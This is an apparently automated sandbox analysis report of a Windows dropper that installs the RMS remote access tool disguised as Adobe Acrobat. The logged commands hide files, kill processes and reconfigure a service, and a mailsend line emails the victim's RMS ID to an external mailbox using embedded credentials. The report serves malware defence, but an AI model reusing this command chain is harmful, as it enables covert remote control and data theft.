Analysis
-
max time kernel
150s -
max time network
143s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
25-02-2021 00:37
General
-
Target
7adfb53ec021010a6921ac70f006c588d25278591ebc7a141a97db8e8ce10e2c.bin.exe
-
Size
5.0MB
-
MD5
24cae17860a840c0317018ef3d607e94
-
SHA1
7595283fd24ebae9f95ea80209d674ca9bd2afcc
-
SHA256
7adfb53ec021010a6921ac70f006c588d25278591ebc7a141a97db8e8ce10e2c
-
SHA512
bdfe1b899ef55a0ae793e672c190d79161899179d98b0577b5ceda8f02c66376ca0d366c0f087dbb043d30c7ec41a39b0cd2fcc6be4d66639777c6430db3ee82
Malware Config
Signatures
-
RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
-
Executes dropped EXE 8 IoCs
-
Sets file to hidden 1 TTPs
Modifies file attributes to stop it showing in Explorer etc.
-
Stops running service(s) 3 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops file in Program Files directory 27 IoCs
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Delays execution with timeout.exe 2 IoCs
-
Kills process with taskkill 4 IoCs
-
Runs .reg file with regedit 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 20 IoCs
-
Suspicious behavior: SetClipboardViewer 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 9 IoCs
-
Suspicious use of SetWindowsHookEx 4 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Views/modifies file attributes 1 TTPs 8 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\7adfb53ec021010a6921ac70f006c588d25278591ebc7a141a97db8e8ce10e2c.bin.exe"C:\Users\Admin\AppData\Local\Temp\7adfb53ec021010a6921ac70f006c588d25278591ebc7a141a97db8e8ce10e2c.bin.exe"1⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files\Adobe\AdobeAcrobat\install.bat" "2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\Adobe\AdobeAcrobat"3⤵
- Drops file in Program Files directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\Adobe\AdobeAcrobat\*.*"3⤵
- Drops file in Program Files directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\Adobe\AdobeAcrobat\Logs"3⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\Adobe\AdobeAcrobat\Logs\*.*"3⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im rfusclient.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im rutserv.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Acrobat-XI.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im AdobeFP.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\sc.exesc delete AdobeReader3⤵
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\SYSTEM\Hardware Driver\LocalDisk" /f3⤵
-
C:\Program Files\Adobe\AdobeAcrobat\AdobeFP.exe"C:\Program Files\Adobe\AdobeAcrobat\AdobeFP.exe" /silentinstall3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Adobe\AdobeAcrobat\AdobeFP.exe"C:\Program Files\Adobe\AdobeAcrobat\AdobeFP.exe" /firewall3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\regedit.exeregedit /s "C:\Program Files\Adobe\AdobeAcrobat\regedit.reg"3⤵
- Runs .reg file with regedit
-
C:\Windows\SysWOW64\sc.exesc failure AdobeReader reset= 0 actions= restart/1000/restart/1000/restart/10003⤵
-
C:\Windows\SysWOW64\sc.exesc config AdobeReader obj= LocalSystem type= interact type= own3⤵
-
C:\Program Files\Adobe\AdobeAcrobat\AdobeFP.exe"C:\Program Files\Adobe\AdobeAcrobat\AdobeFP.exe" /start3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\timeout.exetimeout 103⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\reg.exereg export "HKLM\SYSTEM\Hardware Driver\LocalDisk\v4\Server\Parameters" "IT.txt"3⤵
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\timeout.exetimeout 103⤵
- Delays execution with timeout.exe
-
C:\Program Files\Adobe\AdobeAcrobat\mailsend.exemailsend.exe -t zik.sup@bk.ru -attach IT.txt,application/txt -sub "RMS ID" -smtp smtp.mail.ru -port 465 -f zik.sup@bk.ru -name "RMS ToktonIT" -ssl -auth-login -user zik.sup@bk.ru -pass hT*euyAyCT43 -q3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\attrib.exeattrib "regedit.reg" -S -H /S /D3⤵
- Drops file in Program Files directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeattrib "install.bat" -S -H /S /D3⤵
- Drops file in Program Files directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeattrib "IT.txt" -S -H /S /D3⤵
- Drops file in Program Files directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeattrib "mailsend.exe" -S -H /S /D3⤵
- Drops file in Program Files directory
- Views/modifies file attributes
-
C:\Program Files\Adobe\AdobeAcrobat\AdobeFP.exe"C:\Program Files\Adobe\AdobeAcrobat\AdobeFP.exe"1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Adobe\AdobeAcrobat\Acrobat-XI.exe"C:\Program Files\Adobe\AdobeAcrobat\Acrobat-XI.exe" /tray2⤵
- Executes dropped EXE
-
C:\Program Files\Adobe\AdobeAcrobat\Acrobat-XI.exe"C:\Program Files\Adobe\AdobeAcrobat\Acrobat-XI.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Adobe\AdobeAcrobat\Acrobat-XI.exe"C:\Program Files\Adobe\AdobeAcrobat\Acrobat-XI.exe" /tray3⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Adobe\AdobeAcrobat\Acrobat-XI.exeMD5
d503b890a8a662f8510f7c15be329f31
SHA1ecad117d1ca7be14e91f93095e87d08f4e11770a
SHA256c5e786e10ef3cda75ec5851afa321180821a2994b9c2813b0a1b70825917ccf6
SHA512374a92556e1beb6216bb6e3a0cb28f88a5f6231fb217e8595e40b86e936036cfdb58e070e85c6d3ff4735b113fcabb56e626a51d0886e5a3461196f37f0be866
-
C:\Program Files\Adobe\AdobeAcrobat\Acrobat-XI.exeMD5
d503b890a8a662f8510f7c15be329f31
SHA1ecad117d1ca7be14e91f93095e87d08f4e11770a
SHA256c5e786e10ef3cda75ec5851afa321180821a2994b9c2813b0a1b70825917ccf6
SHA512374a92556e1beb6216bb6e3a0cb28f88a5f6231fb217e8595e40b86e936036cfdb58e070e85c6d3ff4735b113fcabb56e626a51d0886e5a3461196f37f0be866
-
C:\Program Files\Adobe\AdobeAcrobat\Acrobat-XI.exeMD5
d503b890a8a662f8510f7c15be329f31
SHA1ecad117d1ca7be14e91f93095e87d08f4e11770a
SHA256c5e786e10ef3cda75ec5851afa321180821a2994b9c2813b0a1b70825917ccf6
SHA512374a92556e1beb6216bb6e3a0cb28f88a5f6231fb217e8595e40b86e936036cfdb58e070e85c6d3ff4735b113fcabb56e626a51d0886e5a3461196f37f0be866
-
C:\Program Files\Adobe\AdobeAcrobat\Acrobat-XI.exeMD5
d503b890a8a662f8510f7c15be329f31
SHA1ecad117d1ca7be14e91f93095e87d08f4e11770a
SHA256c5e786e10ef3cda75ec5851afa321180821a2994b9c2813b0a1b70825917ccf6
SHA512374a92556e1beb6216bb6e3a0cb28f88a5f6231fb217e8595e40b86e936036cfdb58e070e85c6d3ff4735b113fcabb56e626a51d0886e5a3461196f37f0be866
-
C:\Program Files\Adobe\AdobeAcrobat\AdobeFP.exeMD5
36960b2c933dd8a0d7f8b78f761d2521
SHA1636050040deede91b65bac0d93fd86cc89b156a9
SHA256e5d26ea508f0b32fa82c2e8ed8a3b092cff8d033b23169ca8820b896f6bfdb9a
SHA51250bd1519a784660c12238283027569318dc5908752f33064f888f8f4762f27a746ba724e81dd54dc2d98002d423c113f893aa9d4bb2e66e0c37b5e65fc034793
-
C:\Program Files\Adobe\AdobeAcrobat\AdobeFP.exeMD5
36960b2c933dd8a0d7f8b78f761d2521
SHA1636050040deede91b65bac0d93fd86cc89b156a9
SHA256e5d26ea508f0b32fa82c2e8ed8a3b092cff8d033b23169ca8820b896f6bfdb9a
SHA51250bd1519a784660c12238283027569318dc5908752f33064f888f8f4762f27a746ba724e81dd54dc2d98002d423c113f893aa9d4bb2e66e0c37b5e65fc034793
-
C:\Program Files\Adobe\AdobeAcrobat\AdobeFP.exeMD5
36960b2c933dd8a0d7f8b78f761d2521
SHA1636050040deede91b65bac0d93fd86cc89b156a9
SHA256e5d26ea508f0b32fa82c2e8ed8a3b092cff8d033b23169ca8820b896f6bfdb9a
SHA51250bd1519a784660c12238283027569318dc5908752f33064f888f8f4762f27a746ba724e81dd54dc2d98002d423c113f893aa9d4bb2e66e0c37b5e65fc034793
-
C:\Program Files\Adobe\AdobeAcrobat\AdobeFP.exeMD5
36960b2c933dd8a0d7f8b78f761d2521
SHA1636050040deede91b65bac0d93fd86cc89b156a9
SHA256e5d26ea508f0b32fa82c2e8ed8a3b092cff8d033b23169ca8820b896f6bfdb9a
SHA51250bd1519a784660c12238283027569318dc5908752f33064f888f8f4762f27a746ba724e81dd54dc2d98002d423c113f893aa9d4bb2e66e0c37b5e65fc034793
-
C:\Program Files\Adobe\AdobeAcrobat\AdobeFP.exeMD5
36960b2c933dd8a0d7f8b78f761d2521
SHA1636050040deede91b65bac0d93fd86cc89b156a9
SHA256e5d26ea508f0b32fa82c2e8ed8a3b092cff8d033b23169ca8820b896f6bfdb9a
SHA51250bd1519a784660c12238283027569318dc5908752f33064f888f8f4762f27a746ba724e81dd54dc2d98002d423c113f893aa9d4bb2e66e0c37b5e65fc034793
-
C:\Program Files\Adobe\AdobeAcrobat\IT.txtMD5
ccca303690c5fa23058b535c00da30ee
SHA1485a983b4c46028beac7b9e9e5864b5e90cb6f71
SHA256f7c2d48a8c6ad9cc649fe4740a6af8a394f463bdb1e44301b77f8efdd2db9ebc
SHA512fc0746a6a5c2dd3d34e516e55eb091da0267ec642193df5d69f61de362de748283469adf10d4d7f0c8e7014024ad58892e476895f99dd5d7c4a18c40c753bd88
-
C:\Program Files\Adobe\AdobeAcrobat\install.batMD5
6755b49f34a6754bd63e856a4d2ba55c
SHA1697eff97f486dff0365f7524e94d885e134643dc
SHA256c0aa0ed05f4056a42bd651d0e5cf73222f91a97dc7982d399357cd87a7c723e8
SHA512a1df37c283e069b731dc95d857543839ae3affab0205451efd337fcc9abe89c41bb8476aa349f6552954fac0d4785dad25f846e64c5f16fe06c6d27c5a8d4adb
-
C:\Program Files\Adobe\AdobeAcrobat\mailsend.exeMD5
ac23b87f8ec60ddd3f555556f89a6af8
SHA13cea6f84757d15ee8d7fa19d3dfc4992c50aa90c
SHA25680a1d0a15066c7af67cf5377e59e450c2a96018505236f8f3352173282b27ae4
SHA51257e67eab9c2a3b94161500eb0091533a539454e9bfddd47c61477299de9455b7ca11c498c5d8a7d77f4763a2053acb4ff96868a9313fede29969edc16d35b167
-
C:\Program Files\Adobe\AdobeAcrobat\mailsend.exeMD5
ac23b87f8ec60ddd3f555556f89a6af8
SHA13cea6f84757d15ee8d7fa19d3dfc4992c50aa90c
SHA25680a1d0a15066c7af67cf5377e59e450c2a96018505236f8f3352173282b27ae4
SHA51257e67eab9c2a3b94161500eb0091533a539454e9bfddd47c61477299de9455b7ca11c498c5d8a7d77f4763a2053acb4ff96868a9313fede29969edc16d35b167
-
C:\Program Files\Adobe\AdobeAcrobat\regedit.regMD5
72344861e4f61574a9ca9aba1ce870d0
SHA111516660ef7edce57b5674643df666ec662dfa6b
SHA256befb655c4731c7a91de7b1aa5e5401519021dabbcef6b895240eefed27e35649
SHA5129b41fa86a7ed7dbcfd7c4b95be5002e04dbf47cd64814c0c55e8305ee48fb0697607527ef6d755391f592bd3062675c886ff4484cbcaaa7c156826ed70bf308e
-
C:\Program Files\Adobe\AdobeAcrobat\vp8decoder.dllMD5
d43fa82fab5337ce20ad14650085c5d9
SHA1678aa092075ff65b6815ffc2d8fdc23af8425981
SHA256c022958429edd94bfe31f2eacfe24ff6b45d6f12747725c449a36116373de03b
SHA512103e61a9f58df03316676a074487e50ec518479c11068df3736df139b85c7671048c65bce0ef2c55b3c50c61fde54e9e6c7d1b795aea71263ae94c91d4874e0d
-
C:\Program Files\Adobe\AdobeAcrobat\vp8encoder.dllMD5
dab4646806dfca6d0e0b4d80fa9209d6
SHA18244dfe22ec2090eee89dad103e6b2002059d16a
SHA256cb6ef96d3a66ef08ec2c8640b751a52d6d4f4530cf01162a69966f0fd5153587
SHA512aa5eb93bf23a10de797d6fb52a55a95d36bc48927c76fedd81e0c48872745cb7f7d1b3f230eaae42fd4e79b6a59ca707e56bd6963b03644cbd5984f11e98d6e7
-
C:\Program Files\Adobe\AdobeAcrobat\webmmux.dllMD5
9581f7064028a782182e8a4411e9afa5
SHA19356d9f62fc38a1150c3cad556b2a531cd7d430b
SHA256320a23db8d34bd2628078903d4496d4b9320d50c13d11283f77a8c3b9ec36698
SHA51201c5a711bd0d7cea5cae906c163b7a98c3b09b8ce5a5b52f096d806e20d7f28fe3e174eb6ba8ff630b870b1cea3d9d72905227a989d70e312d79b55644e6442c
-
C:\Program Files\Adobe\AdobeAcrobat\webmvorbisdecoder.dllMD5
ec59d88c3ebda7c2ce36dcdbe4c67e5b
SHA18b01a5730ebda5729a57d97abec1de00c7cf0218
SHA25654b661f2d55f5cafccd7aca334efb89e908b3f19e3e35c9aa661221b31ec60e3
SHA51246963b390affcb1f6e5d42ae4f4a67a453d9048e8f8b825bb543a1c2031f1ece07d2f295d30eff51a6624bf096e0d10f8ba8d6516b28e63926f214eb7d7e5b84
-
C:\Program Files\Adobe\AdobeAcrobat\webmvorbisencoder.dllMD5
12eba58e4c0450ccb2d9fdce22255d09
SHA11f88ce0834e0bcf0f61ed0557204ef05dd577b1e
SHA256c80464f71b46411b01962b6095acd6eb2ed09ad8d6eb0a67840826a6297823b2
SHA51208f999aeb55968de3dacb560a25174e5a1c29eb2ea95a6fc8f770c10369263e2f8cea525f93c89a0e03954ff1221b4486641fc9a892d53a8857e9cf441ec05d4
-
memory/196-54-0x0000000000000000-mapping.dmp
-
memory/512-35-0x0000000000000000-mapping.dmp
-
memory/656-36-0x0000000000000000-mapping.dmp
-
memory/656-39-0x0000000000B30000-0x0000000000B31000-memory.dmpFilesize
4KB
-
memory/692-155-0x0000000000000000-mapping.dmp
-
memory/748-5-0x0000000000000000-mapping.dmp
-
memory/808-40-0x00000000001E0000-0x00000000001E1000-memory.dmpFilesize
4KB
-
memory/1116-48-0x00000000025C0000-0x00000000025C1000-memory.dmpFilesize
4KB
-
memory/1116-41-0x0000000000000000-mapping.dmp
-
memory/1116-47-0x0000000003540000-0x0000000003541000-memory.dmpFilesize
4KB
-
memory/1116-46-0x0000000002D40000-0x0000000002D41000-memory.dmpFilesize
4KB
-
memory/1120-49-0x0000000000B20000-0x0000000000B21000-memory.dmpFilesize
4KB
-
memory/1120-42-0x0000000000000000-mapping.dmp
-
memory/1540-45-0x0000000000000000-mapping.dmp
-
memory/2668-156-0x0000000000000000-mapping.dmp
-
memory/2800-4-0x0000000000000000-mapping.dmp
-
memory/3188-15-0x0000000000000000-mapping.dmp
-
memory/3324-21-0x0000000000000000-mapping.dmp
-
memory/3600-2-0x0000000000000000-mapping.dmp
-
memory/3816-20-0x0000000000000000-mapping.dmp
-
memory/3828-16-0x0000000000000000-mapping.dmp
-
memory/3912-17-0x0000000000000000-mapping.dmp
-
memory/4068-19-0x0000000000000000-mapping.dmp
-
memory/4076-18-0x0000000000000000-mapping.dmp
-
memory/4180-157-0x0000000000000000-mapping.dmp
-
memory/4184-154-0x0000000000000000-mapping.dmp
-
memory/4256-53-0x0000000000000000-mapping.dmp
-
memory/4348-60-0x00000000033F0000-0x00000000033F1000-memory.dmpFilesize
4KB
-
memory/4348-58-0x00000000033F0000-0x00000000033F1000-memory.dmpFilesize
4KB
-
memory/4348-59-0x0000000003BF0000-0x0000000003BF1000-memory.dmpFilesize
4KB
-
memory/4348-55-0x0000000000000000-mapping.dmp
-
memory/4432-27-0x0000000002F10000-0x0000000002F11000-memory.dmpFilesize
4KB
-
memory/4432-26-0x0000000003710000-0x0000000003711000-memory.dmpFilesize
4KB
-
memory/4432-23-0x0000000000000000-mapping.dmp
-
memory/4432-25-0x0000000002F10000-0x0000000002F11000-memory.dmpFilesize
4KB
-
memory/4432-31-0x0000000000C90000-0x0000000000C91000-memory.dmpFilesize
4KB
-
memory/4444-22-0x0000000000000000-mapping.dmp
-
memory/4508-33-0x0000000000000000-mapping.dmp
-
memory/4516-29-0x0000000000000000-mapping.dmp
-
memory/4516-32-0x0000000000D10000-0x0000000000D11000-memory.dmpFilesize
4KB
-
memory/4528-34-0x0000000000000000-mapping.dmp
-
memory/4684-52-0x0000000000B30000-0x0000000000B31000-memory.dmpFilesize
4KB
-
memory/4684-50-0x0000000000000000-mapping.dmp